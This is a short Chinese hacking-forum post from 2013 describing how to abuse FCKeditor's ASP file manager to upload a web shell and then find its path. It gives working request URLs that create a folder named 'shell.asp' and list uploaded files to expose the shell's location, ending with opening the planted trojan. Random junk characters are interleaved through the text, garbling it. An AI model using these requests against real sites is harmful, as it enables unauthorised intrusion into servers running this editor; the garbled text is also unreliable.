中国网络渗透测试联盟

标题: fckeditor找上传路径方法 [打印本页]
作者: admin    时间: 2013-10-17 19:37
标题: fckeditor找上传路径方法
网上流行着是上传是这样子的1 t# l; H+ M3 c7 U6 I4 j
3 ^- j9 @' n8 H9 C
http://localhost/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
8 ]0 q, o2 X+ Phttp://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=12447899756844 v8 s5 B9 x4 o% B

; `. L9 t( p$ q上传后老找不到路径,测了一下,我发现* u3 F" o6 B, {3 F

& m+ l) g% D( K  c" B( G+ nFCKeditor3/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
" P9 C9 |# h$ Z- T' a. |% b. |, x5 G6 g( Z: J8 G) i4 `2 \5 e0 W6 A
可以爆出路径,显示以下内容
1 ?& y; [: k. g
+ x7 a- `3 w  z$ x4 n- w( R2 e4 O9 `9 B! N: J
得出路径,直接打开就见到马子* y3 [* g. ^- ?0 Y5 t




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2